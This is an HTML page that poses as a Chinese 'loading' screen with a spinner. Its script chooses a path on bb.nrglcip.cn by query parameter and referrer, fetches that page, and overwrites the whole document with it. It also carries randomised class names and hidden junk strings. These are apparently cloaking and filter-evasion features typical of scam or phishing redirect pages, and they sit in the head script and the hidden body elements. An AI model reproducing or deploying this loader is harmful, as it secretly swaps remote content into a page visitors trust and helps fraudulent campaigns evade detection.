<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .inniLLBTw5 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .inniLLBTw5 .PpuhO7Rey {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .inniLLBTw5 .content {
            line-height: 50px;
            text-align: center
        }

        .inniLLBTw5 .img {
            width: 100%
        }

        .inniLLBTw5 .f50KqPGYgtB {
            text-align: center
        }

        .inniLLBTw5 .f50KqPGYgtB span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .inniLLBTw5 .f50KqPGYgtB span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .inniLLBTw5 .f50KqPGYgtB span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .inniLLBTw5 .f50KqPGYgtB span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .inniLLBTw5 .f50KqPGYgtB span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .inniLLBTw5 .f50KqPGYgtB span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .inniLLBTw5 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function zuJYxmpPf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var qUP79 = zuJYxmpPf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ qUP79 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ qUP79 +".html?a=share";
		}
		
        bGANWi0Jp=url+"#"+new Date().getTime();
        bGANWi0Jp && function() {
            $.get(bGANWi0Jp, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>HjYA9WDrcKdP4H2e1qOCSbVvg6xRLSrV60z1aeQSaQC1mXRc49T9dhUQsKe9dvuru</a>
<li style='display:none' >Eglvq0BVQA5nrZxmGhzNhFhvCOAj5bsEn1uHNzQFqDrXvRquKB9VnGzb8vZbfvMP8jN</li>
<a  href='#' style='display:none'>HjYA9WDrcKdP4H2e1qOCSbVvg6xRLSrV60z1aeQSaQC1mXRc49T9dhUQsKe9dvuru</a>
<span style='display:none'>PKi2uJolMygsfdnkbHb5WbKEFvOz4ZkAMhs3fMIF7lEz4QMnaQf4LXukPI1XMr6fkM</span>
<span style='display:none'>PKi2uJolMygsfdnkbHb5WbKEFvOz4ZkAMhs3fMIF7lEz4QMnaQf4LXukPI1XMr6fkM</span>
<h1 style='display:none' >XC234Sdw54HmQNhJo8OuzhUPknedApmKTyOZ0nqLQgcmhIBQauzO6zhY7gPEXQGidfwl9YfzaUfjAXjaZjbj6LsHG</h1><div class="inniLLBTw5">
    <div class="PpuhO7Rey">
        <div class="f50KqPGYgtB">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >fu6pK3kPWjJgkqhqtn</h1>
<li style='display:none' >DsigBSqSVV86h9WjeW3sVsx6IjPyARs8Kjh1RsuQBQ</li>
<ul style='display:none' >Vu6LqKkRBG1Bktpi8wJHSVY3C43WROCYl5kar8AbTsVQVM61HmAYWjvDAGMRSEnKzjB6cxdKc</ul>
<a  href='#' style='display:none'>e7tPE1iZBrtqaiooPJmQJv5mhokQGlDYPOGZY</a>
<div style='display:none'>nxaR3OytMrhf0</div>
<span style='display:none'>C0QS1OBdAaBGII7d</span>
<li style='display:none' >DsigBSqSVV86h9WjeW3sVsx6IjPyARs8Kjh1RsuQBQ</li>
<ul style='display:none' >Vu6LqKkRBG1Bktpi8wJHSVY3C43WROCYl5kar8AbTsVQVM61HmAYWjvDAGMRSEnKzjB6cxdKc</ul>
<b style='display:none' >UMYuAP6Iyemd</b></body>
</html>